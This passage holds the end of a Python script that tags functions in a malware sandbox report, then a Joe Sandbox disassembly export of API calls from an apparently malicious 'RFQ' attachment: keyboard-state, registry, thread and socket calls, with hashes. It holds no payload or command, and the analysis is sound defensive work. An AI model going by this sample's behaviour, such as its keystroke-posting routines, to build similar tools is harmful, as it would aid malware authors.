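• Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
"""

CALL_RE = re.compile(
    r"^\s*•\s*(?P<nested>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
META_RE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|Opcode ID|Instruction ID):\s*(?P<val>.*?)\s*$")


@dataclass
class Call:
    name: str
    module: str
    args: list
    ref: str
    nested: bool  # True for "Part of subcall function" lines


@dataclass
class Record:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)


def parse_records(text):
    """Split the listing at each 'APIs' heading and parse calls and metadata."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = Record()
            records.append(cur)
        elif cur is not None:
            if m := CALL_RE.match(line):
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                cur.calls.append(Call(m["name"], m["module"], args, m["ref"], bool(m["nested"])))
            elif m := META_RE.match(line):
                cur.meta[m["key"]] = m["val"]
    return records


NET_MODULES = {"WSOCK32", "WS2_32", "WININET", "WINHTTP"}
THREAD_APIS = {"CreateThread", "CreateRemoteThread", "ResumeThread", "QueueUserAPC", "SetThreadContext"}
AUTOIT_MARKERS = ("#OnAutoItStartRegister", "#requireadmin", "#notrayicon", "FOR..IN loop")
CREATE_SUSPENDED = 0x4  # dwCreationFlags bit; fifth CreateThread argument


def classify(rec):
    """Return behaviour tags for one record. Only direct calls count, so a
    helper that happens to touch the registry does not tag its caller."""
    tags = set()
    direct = [c for c in rec.calls if not c.nested]
    names = {c.name for c in direct}
    if any(c.module.upper() in NET_MODULES for c in direct):
        tags.add("network")
    if names & THREAD_APIS:
        tags.add("thread")
    if any(re.match(r"Reg(?!ister)", n) for n in names):  # RegOpenKeyExW yes, RegisterClassW no
        tags.add("registry")
    if any(m in rec.meta.get("String ID", "") for m in AUTOIT_MARKERS):
        tags.add("autoit-runtime")
    for c in direct:
        # Argument values are hex as printed by the report; '?' means unresolved.
        if c.name == "CreateThread" and len(c.args) >= 5 and c.args[4] != "?":
            if int(c.args[4], 16) & CREATE_SUSPENDED:
                tags.add("thread-created-suspended")
        if c.name == "WSAStartup" and c.args and c.args[0] != "?":
            ver = int(c.args[0], 16)  # wVersionRequested: low byte major, high byte minor
            tags.add(f"winsock-{ver & 0xFF}.{ver >> 8}")
    return tags


def triage(text):
    """Map each record's Instruction ID prefix to its sorted tags."""
    return {r.meta.get("Instruction ID", "?")[:8]: sorted(classify(r)) for r in parse_records(text)}


if __name__ == "__main__":
    for fid, tags in triage(SAMPLE).items():
        print(fid, ", ".join(tags) or "-")
```

Run against the full text export of a report, the output is a one-line-per-function summary keyed by Instruction ID, which is enough to jump straight to the functions that open sockets, create suspended threads, or carry AutoIt interpreter strings rather than scrolling past CRT and GDI boilerplate.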
                                                        APIs
                                                        • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                        • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                        • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                        • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                        • String ID:
                                                        • API String ID: 1457242333-0
                                                        • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                        • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                        • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                        • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                        APIs
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ConnectRegistry_memmove_wcslen
                                                        • String ID:
                                                        • API String ID: 15295421-0
                                                        • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                        • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                        • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                        • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                        APIs
                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                        • _wcstok.LIBCMT ref: 004675B2
                                                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                        • _wcscpy.LIBCMT ref: 00467641
                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                        • _wcslen.LIBCMT ref: 00467793
                                                        • _wcslen.LIBCMT ref: 004677BD
                                                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                        • String ID: X
                                                        • API String ID: 780548581-3081909835
                                                        • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                        • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                        • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                        • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                        APIs
                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                        • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                        • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                        • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                        • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                        • CloseFigure.GDI32(?), ref: 0044751F
                                                        • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                        • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                        • String ID:
                                                        • API String ID: 4082120231-0
                                                        APIs
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                        • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                        • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                        • String ID:
                                                        • API String ID: 2027346449-0
                                                        APIs
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                        • GetMenu.USER32 ref: 0047A703
                                                        • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                        • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                        • _wcslen.LIBCMT ref: 0047A79E
                                                        • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                        • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                        • String ID:
                                                        • API String ID: 3257027151-0
                                                        APIs
                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: ErrorLastselect
                                                        • String ID:
                                                        • API String ID: 215497628-0
                                                        APIs
                                                        • GetParent.USER32(?), ref: 0044443B
                                                        • GetKeyboardState.USER32(?), ref: 00444450
                                                        • SetKeyboardState.USER32(?), ref: 004444A4
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        APIs
                                                        • GetParent.USER32(?), ref: 00444633
                                                        • GetKeyboardState.USER32(?), ref: 00444648
                                                        • SetKeyboardState.USER32(?), ref: 0044469C
                                                        • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                        • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                        • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                        • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        APIs
                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                        • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                        • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                        • String ID:
                                                        • API String ID: 2354583917-0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        APIs
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Window$Enable$Show$MessageMoveSend
                                                        • String ID:
                                                        • API String ID: 896007046-0
                                                        APIs
                                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                        • GetFocus.USER32 ref: 00448ACF
                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Window$Enable$Show$FocusMessageSend
                                                        • String ID:
                                                        • API String ID: 3429747543-0
                                                        • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                        • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                        • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                        • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                        • __swprintf.LIBCMT ref: 0045D4E9
                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                        • String ID: %lu$\VH
                                                        • API String ID: 3164766367-2432546070
                                                        • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                        • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                        • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                        • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                        • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                        • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Msctls_Progress32
                                                        • API String ID: 3850602802-3636473452
                                                        • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                        • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                        • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                        • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                        Similarity
                                                        • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                        • String ID:
                                                        • API String ID: 3985565216-0
                                                        • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                        • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                        • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                        • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                        APIs
                                                        • _malloc.LIBCMT ref: 0041F707
                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                        • _free.LIBCMT ref: 0041F71A
                                                        Similarity
                                                        • API ID: AllocateHeap_free_malloc
                                                        • String ID: [B
                                                        • API String ID: 1020059152-632041663
                                                        • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                        • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                        • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                        • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                        APIs
                                                        • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                        • __calloc_crt.LIBCMT ref: 00413DB0
                                                        • __getptd.LIBCMT ref: 00413DBD
                                                        • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                        • _free.LIBCMT ref: 00413E07
                                                        • __dosmaperr.LIBCMT ref: 00413E12
                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                        Similarity
                                                        • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                        • String ID:
                                                        • API String ID: 155776804-0
                                                        • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                        • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                        • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                        • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                        APIs
                                                          • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                          • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                        • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                        • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                        Similarity
                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                        • String ID:
                                                        • API String ID: 1957940570-0
                                                        • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                        • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                        • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                        • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                        APIs
                                                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                        • ExitThread.KERNEL32 ref: 00413D4E
                                                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                        • __freefls@4.LIBCMT ref: 00413D74
                                                        Similarity
                                                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                        • String ID:
                                                        • API String ID: 259663610-0
                                                        • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                        • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                        • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                        • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                        APIs
                                                        • GetClientRect.USER32(?,?), ref: 004302E6
                                                        • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                        • GetClientRect.USER32(?,?), ref: 00430364
                                                        • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                        • GetWindowRect.USER32(?,?), ref: 004303C3
                                                        • ScreenToClient.USER32(?,?), ref: 004303EC
                                                        Similarity
                                                        • API ID: Rect$Client$Window$MetricsScreenSystem
                                                        • String ID:
                                                        • API String ID: 3220332590-0
                                                        • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                        • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                        • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                        • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                        Similarity
                                                        • API ID: _malloc_wcslen$_strcat_wcscpy
                                                        • String ID:
                                                        • API String ID: 1612042205-0
                                                        • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                        • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                        • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                        • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                        Similarity
                                                        • API ID: _memmove_strncmp
                                                        • String ID: >$U$\
                                                        • API String ID: 2666721431-237099441
                                                        • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                        • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                        • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                        • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
APIs
• GetKeyboardState.USER32(?), ref: 0044C570
• SetKeyboardState.USER32(00000080), ref: 0044C594
• PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
• PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
• PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
• SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: MessagePost$KeyboardState$InputSend
• String ID:
• API String ID: 2221674350-0
• Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
• Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
• Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
